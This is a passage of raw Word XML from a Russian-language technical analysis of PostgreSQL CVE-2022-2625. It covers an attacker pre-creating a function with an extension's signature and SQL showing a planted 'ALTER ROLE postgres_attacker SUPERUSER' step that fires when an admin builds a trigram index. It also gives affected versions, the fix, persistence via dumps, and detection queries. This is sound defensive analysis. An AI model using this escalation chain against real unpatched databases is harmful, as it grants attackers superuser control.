        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Встречает: CREATE OR REPLACE FUNCTION public.gin_extract_value_trgm(text, internal) RETURNS internal AS '$libdir/pg_trgm', 'gin_extract_value_trgm' LANGUAGE C ...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Функция уже существует (создана атакующим)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- CREATE OR REPLACE → переписывает АТРИБУТЫ функции (LANGUAGE, owner, security context)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- НО тело (prosrc) остаётся атакующее — баг</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Функция теперь owned by admin, считается частью extension pg_trgm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Когда trigram-функция вызывается (для индексной обработки), исполняется plpgsql-тело атакующего под admin-привилегиями</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что происходит после фикса:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ERROR: function "public.gin_extract_value_trgm(text, internal)" already exists</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">HINT: cannot replace function owned by another role</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Шаг 3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (deferred trigger):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В отличие от 3.13.3 (где trigger — это ANALYZE), здесь trigger — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">любое использование функции, которая теперь принадлежит extension</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gin_extract_value_trgm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> triggering происходит автоматически при первом GIN-индексе с pg_trgm operator class:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- admin создаёт legitimate index с pg_trgm:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE INDEX ON users USING gin (email gin_trgm_ops);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ при построении индекса вызывается gin_extract_value_trgm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ↑ исполняется ALTER ROLE postgres_attacker SUPERUSER от admin-привилегий</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Эскалация до superuser за счёт того, что extension owner (типично superuser) вызывает функцию, тело которой контролирует атакующий. После этого — полный набор векторов 3.7. Особенность атаки: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">deferred</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — между установкой extension и активацией может пройти неопределённое время (от секунд до месяцев), что усложняет атрибуцию и forensic-анализ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Дополнительный эффект: extension в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теперь содержит «owned» функцию атакующего.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корректно дампит её как часть extension, что означает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">persistence через backup/restore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: даже после фикса PG восстановление из dump может восстановить trojan, если дамп был сделан под уязвимой версией.</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OR REPLACE FUNCTION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в PostgreSQL — стандартная команда, которая по дизайну позволяет обновить тело существующей функции. До CVE-2022-2625 поведение в контексте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было таким: если функция уже существует, скрипт extension успешно её «забирал» в extension, обновляя metadata, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">но сохраняя prosrc от pre-existing function</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это was не задокументированный path, который никто не валидировал на корректность.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Глубинная причина — PostgreSQL doesn't track ownership chains для functions так строго, как для таблиц. Для table </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE OR REPLACE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не существует — есть только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(ошибка если exists) или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">DROP + CREATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для функций </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE OR REPLACE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> существовал именно как convenience для extension upgrades, что и было exploit-ed.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Фикс — добавление проверки ownership в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CreateFunction</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CreateProcedure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> при флаге replace: если функция exists И owner != current_role, ERROR. Реализация в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">src/backend/commands/functioncmds.c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CreateFunction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interpret_function_parameter_list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → новая проверка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_proc_ownercheck</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 (уязвима):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ≤ 14.4, 13.7, 12.11, 11.16, 10.21. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Фикс:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 14.5, 13.8, 12.12, 11.17, 10.22 (выпущены 11 августа 2022).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CREATE FUNCTION в схеме, где extension будет создавать функцию (для contrib-extensions типично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что до PG 15 разрешено PUBLIC)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Знание signature функции из extension script (читается из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/share/postgresql/&lt;ver&gt;/extension/&lt;name&gt;--&lt;v&gt;.sql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Superuser не требуется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жертвы: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admin/superuser, выполняющий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(типично DBA, automated provisioning, package upgrade)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 уязвимые</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (примеры из contrib, использующие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE OR REPLACE FUNCTION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в install-script):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intarray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intagg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hstore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citext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cube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earthdistance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adminpack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ltree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xml2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isn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не все из них имеют exploitable function signatures, но pattern одинаковый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нет специальных требований.</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CVE-2022-2625</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 per PostgreSQL Project)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 августа 2022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 14.4, 13.7, 12.11, 11.16, 10.21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14.5, 13.8, 12.12, 11.17, 10.22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Ownership check missing в CREATE OR REPLACE из extension scripts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Privilege escalation от CREATE-FUNCTION до superuser</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OR REPLACE FUNCTION</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в extension scripts — стандартный pattern для contrib-extensions; так делают практически все pg-extensions в их upgrade scripts. Сама команда не подозрительна.</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Pre-create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ddl_command_end</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от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">non-DBA роли</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в схемах, где обычно создают функции extensions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pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). В нормальной operations user-роли НЕ создают функции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с signature, совпадающей с extension-функциями.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Pre-create статически</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: дамп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с WHERE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">proowner != extowner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — найти функции, owner которых не совпадает с owner-ом extension (которому функция принадлежит после CVE-2022-2625-style attack).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Trigger time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: ANALYZE, REINDEX, любое использование функции из extension в expression — те же сигналы что 3.13.3 (потому что эффект аналогичный).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audit-логах: цепочка CREATE FUNCTION + CREATE EXTENSION от разных ролей с одинаковыми signature — сильный индикатор.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На версиях PG ≤ 14.4 / 13.7 / 12.11 / 11.16 / 10.21 — любое такое cooccurrence критично.</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Уязвимы все ветки PG до фикса 11.08.2022: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Ветка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 до</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14.5</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13.8</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12.12</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11.16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11.17</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10.21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10.22 (EOL ветка, последний фикс)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">На версиях PG ≥ 14.5 / 13.8 / 12.12 / 11.17 / 10.22 атака </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">закрыта</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — ownership check блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE OR REPLACE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для функций других owner-ов в extension scripts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Дополнительная защита в PG 15</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (релиз 13.10.2022): </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">REVOKE CREATE ON SCHEMA public FROM PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> теперь default для новых кластеров. Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">снижает поверхность атаки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> post-fix: PUBLIC больше не может создавать функции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типичная цель CVE-2022-2625-style attack. Для upgrade-нутых кластеров поведение остаётся старым (public open).</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3.13.2 search_path + schema_element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
